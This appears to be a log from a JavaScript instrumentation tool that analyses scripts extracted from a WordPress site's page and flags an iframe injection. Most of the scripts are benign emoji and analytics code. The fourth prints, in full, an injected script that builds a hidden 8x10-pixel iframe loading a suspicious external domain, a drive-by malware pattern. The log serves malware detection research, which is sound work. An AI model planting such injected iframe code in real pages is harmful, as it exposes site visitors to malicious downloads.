/Users/ketian/Desktop/keHtml/102cbd602e96ded2ab3a566dbb44e33c
------JS--0---------
<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.fondazionefotografia.org\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.7.2"}};
			!function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),!(j.toDataURL().length<3e3)&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,65039,8205,55356,57096),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,55356,57096),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55357,56425,55356,57341,8205,55357,56507),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55357,56425,55356,57341,55357,56507),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
------JS--1---------
<script>
	  /*(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

	  ga('create', 'UA-44133671-1', 'fondazionefotografia.org');
	  ga('send', 'pageview');*/

	</script>
------JS--2---------
<script>
	  /*(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

	  ga('create', 'UA-46205346-1', 'fondazionefotografia.org');
	  ga('send', 'pageview');*/



	  var _gaq = _gaq || [];
	_gaq.push(['_setAccount', 'UA-46205346-1']);
	_gaq.push(['_trackPageview']);

	(function() {
	  var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
	  ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
	  var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
	})();

	</script>
------JS--3---------
<script type="text/javascript"> var xwdjh = "iframe"; var wconf = document.createElement(xwdjh); var farkt = ""; wconf.style.width = "8px"; wconf.style.height = "10px"; wconf.style.border = "0px"; wconf.frameBorder = "0"; wconf.setAttribute("frameBorder", "0"); document.body.appendChild(wconf); farkt = "http://sitemapanalyzes.top/?oq=xfQuLeZVbgfoiUyHeAw1zY5VVFsS9P36j0TTwB6Z0peLqRGOYw8RqqKlJLV_mhj2&qtuif=3776&ct=diamond&q=w3_QMvXcJx7QFYbGMvvDSKNbNkfWHViPxo2G9MildZqqZGX_k7bDfF-qoVrcCgWR"; wconf.src = farkt; </script>
------END JS, total: 4 JS files, concatenated,saved in to tmp_html/*.html---------
[Step] Done instrumentation
[Step] Browser is simulated:
Analysze:file:///Users/ketian/Desktop/jsiframe/tmp_jalangi/102cbd602e96ded2ab3a566dbb44e33c-0_jalangi_.html
Analysze:file:///Users/ketian/Desktop/jsiframe/tmp_jalangi/102cbd602e96ded2ab3a566dbb44e33c-1_jalangi_.html
Analysze:file:///Users/ketian/Desktop/jsiframe/tmp_jalangi/102cbd602e96ded2ab3a566dbb44e33c-2_jalangi_.html
Analysze:file:///Users/ketian/Desktop/jsiframe/tmp_jalangi/102cbd602e96ded2ab3a566dbb44e33c-3_jalangi_.html
WARNING:
[ketian][detection] detect an iframe injection!
[ketian][src] src is http://sitemapanalyzes.top/?oq=xfQuLeZVbgfoiUyHeAw1zY5VVFsS9P36j0TTwB6Z0peLqRGOYw8RqqKlJLV_mhj2&qtuif=3776&ct=diamond&q=w3_QMvXcJx7QFYbGMvvDSKNbNkfWHViPxo2G9MildZqqZGX_k7bDfF-qoVrcCgWR
--------------
